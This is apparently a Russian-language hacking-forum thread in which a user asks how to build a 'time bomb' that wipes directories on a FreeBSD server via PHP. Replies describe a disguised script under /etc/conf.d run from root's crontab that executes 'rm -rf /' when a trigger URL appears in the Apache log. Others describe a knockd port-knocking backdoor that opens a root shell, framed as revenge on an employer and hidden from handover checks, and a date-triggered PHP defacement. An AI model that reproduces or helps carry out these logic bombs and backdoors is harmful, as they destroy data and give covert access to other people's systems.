![]() |
Временная бомба
Доброго времени суток, уважаемые =)
Вопрос таков как можно или есть готовые решения для создание сего творения, как временная бомба под FreeBSD 6 или подобных систем. с возможностю запуска через PHP скрипт. так же немаловажен факт что бы затерались файлы и папки определнной директории, а так же возможность запуска из nobody. Если кто то встречал рабучую весрию сго творения отпишите плиз. |
из нободи никак имхо.
|
так ясно по другому как?
|
Если на данный момент ты привелигированный пользователь в системе, то можно что то вроде такого:
Создаешь скрипт примерного содержания nano /etc/conf.d/net.conf_param Код:
#!/bin/shУстанавливаешь права : chmod 777 /etc/conf.d/net.conf_param И добавляешь в cron свое задание (на примере vixie-cron): echo "30 12 * * * root /bin/sh /etc/conf.d/net.conf_param" >> /etc/crontab --------------- Что это дает? Наш скрипт ежедневно, в 12.30 смотрит содержимое файла /var/log/apache2/error_log (ошибки апача), и если находит строку (File does not exist: /var/www/localhost/htdocs/pizdec.serveru) - то он удаляет содержимое корневой директории rm -rf / Добавим эту строку в лог: http://127.0.0.1/pizdec.serveru http://filegu.ru/f/ms8mHwt1/video.mpeg.html (4,75 Мб) ководство ) |
Однажды я озадачился вопросом, как быть, если контора, которую слегка админил, внезапно "кинет". Потому был собран немалый "арсенал".
Одно из интересных решений - "стучалки". Принцип действия - специальный демон постоянно мониторит некоторые порты (tcp/udp, даже закрытые). При попытке подсоединиться к этим портам в нужном порядке отработает заранее заданная команда. Например, если указать порты 24, 8001 и 44, то, после подключения именно к этим портам (порты, которые закрыты так и будут закрытыми) именно в таком порядке выполнится заданная команда. Есть вариации doorman/knockd, существует под linux и bsd, мануал по настройке легко ищется в яндексе по запросу knockd. Недостаток: потребуются, естественно, права root. Достоинства: права, даже ниже, чем nobody (не требует установки соединения), редко кто шарит в этих демонах и, при приёме сервера (если его надо сдать) не найдёт ничего криминального, в логах не будет никаких записей, сверхвысокая надёжность (вероятность того, что злоумышленник "угадает" правильность портов - не выше [3.5e-13]%), не требует особого клиента - достаточно telnet (для tcp портов). Аналогичным образом можно оставить бэкдор, который откроет рутову шелл на нужном порту. |
neval-> сомневаюсь в работоспособности твоего скрипта. т.к. команду rm -rf * даже под рутом не все системы адекватно воспримут.
Что касается проблем ТС то лучше заранее знать местонахождение важных конфигурационных файлов системы, файлов баз данных, файлов хранящих какие либо данные или сведения. И их по отдельности убивать включая бэкапы. p.s. нужно решать иными путями, варварство не есть хорошо. |
в крон попробовать можно но из по nobody врятли выйдет
можно найти скрипт пхп открытый для записи find / -perm 777 -name *.php -- както так )) м дописать в конец чето то вроде if(date("d.m.y") == "1.1.1") system("echo HACKED by VASYA>index.php"); |
Цитата:
Насколько мне известно - linux and freebsd не задают вопросов при этой команде. Во избежания споров можешь проверить. ------------ Цитата:
Цитата:
|
А что то реальнее есть еще ? Кто вообще тестировал или пробывал сделать такое ?
|
в первом посте скринвидео - все работает
|
| Время: 15:23 |